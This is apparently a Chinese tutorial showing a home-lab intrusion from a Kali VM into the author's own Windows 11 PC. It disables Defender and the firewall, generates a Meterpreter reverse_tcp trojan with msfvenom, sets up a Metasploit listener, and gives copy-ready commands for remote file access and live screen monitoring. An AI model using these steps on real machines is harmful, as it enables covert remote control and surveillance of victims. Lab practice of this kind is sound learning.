kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学

本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕

声明:本篇仅仅是将本机作为靶机的一次简易渗透测试,实际情况中基本不可能出现如此简单的木马骇入(往往在上传木马时就被防护功能进行查杀了),况且——任何骇入他人设备的操作都是违法行为,因此仅用作经验分享供学习。

一,确认相关设置

①VMware菜单栏中选择【虚拟机(M)】->【设置(S)】->在网络适配器中确认开启NAT模式

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学_第1张图片

  

 ②控制面板中选择【查看网络状态和任务】->【更改设配器设置

->找到VMnet8网卡,右键【属性】->在属性栏中找到【VMware Bridge Protocol】打开桥接模式,使主机和虚拟机能够互连

③按如下步骤关闭【病毒和威胁防护】与【防火墙和网络保护】,这一步是为了保证待会儿我们上传给本机(靶机)的“小木马”不会被这些强力防护阻拦与清除

进行此步操作请确保本机没有被入侵的风险,笔者写本篇的目的仅为提供经验,

如若出现任何损失,概不负责!


 二,创建木马与上传木马

①打开kali虚拟机,打开终端,输入命令【ifconfig】(注意是if不是ip!)查看虚拟机(攻击机)的ip地址

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学_第2张图片

②输入以下命令,生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe

注————

蓝色部分是上一步查看到的虚拟机(攻击机)的ip地址,请自行查询并修改;

紫色部分是用于监听本机(靶机)的端口,任意选择一个不被占用的端口即可;

绿色部分是本次生成的木马文件的名字,任意设置;

(代码块用于快速复制命令:) 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe

出现如下回显说明成功,且在执行命令的工作目录下生成文件,这里我是在桌面目录即【~/Desktop】执行的命令,因此文件直接生成在了桌面上,读者可自行选择目录执行命令

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学_第3张图片

③上传木马到本机(靶机)上,直接采用最直接的拖动法完成上传...

进行这一步时请确保标题一中相关设置的第③步,否则木马文件会被阻拦或清除!

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学_第4张图片


 三,执行命令以监听本机(靶机)

①在kali终端中依次输入以下命令:

msfconsole

use exploit/multi/handler

windows/meterpreter/reverse_tcp

set lhost 192.168.xx.xxx

set lport 9999

exploit

注————

蓝色部分是虚拟机(攻击机)的ip地址,请自行查询并修改;

紫色部分是用于监听本机(靶机)的端口,需要确保和标题二中创建木马时输入的端口相同

 (代码块用于快速复制命令:) 

msfconsole
use exploit/multi/handler
windows/meterpreter/reverse_tcp
set lhost 192.168.xx.xxx
set lport 9999
exploit

②本机(靶机)运行木马文件“上钩”

在上一步中,执行完命令【exploit】后kali将进入连接状态,kali终端显示如下:

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学_第5张图片

此时在本机中运行木马文件即可,运行后kali将成功完成渗透,并进入【meterpreter】状态

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学_第6张图片


四,测试 

①基础浏览

渗透成功后,虚拟机(攻击机)可以实时监控本机(靶机),可以使用Linux基本命令如:【ls】列出本机(靶机)当前目录的文件和文件夹,【cat】命令查看本机(靶机)的文件具体内容...等等,请读者自行摸索测试,可以使用命令【help】获取命令菜单

②实时监控

使用命令【run vnc】将在虚拟机(攻击机)中生成窗口,实时监控本机(靶机)

③退出连接

使用快捷键【Ctrl + Z】将退出对当前靶机的连接,询问是否退出,输入【y】,如下:

④查看已连接设备(即“上钩”靶机)

退出连接状态后,使用命令【sessions】可以列出所有“上钩”靶机,使用命令【sessions -i Id】可以连接指定id的靶机,如"sessions -i 1"将连接Id为1的靶机

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学_第7张图片


尾声

完成测试后记得及时开启【病毒和威胁防护】与【防火墙和网络保护】,防止本机受到病毒或骇客攻击,具体操作见【标题一的第③步】

本篇技术仅用作经验分享,请勿用于任何非法行为!

任何入侵他人设备的操作都是违法行为!

你可能感兴趣的:(我不会网安!,kali,入侵,骇客)